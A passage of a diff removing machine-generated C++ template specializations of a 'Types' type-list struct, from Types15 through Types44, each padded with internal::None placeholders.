-    typename T11, typename T12, typename T13, typename T14, typename T15>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25,
-      T26> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types37<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types38<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types39<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types40<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39,
-      T40> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types41<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
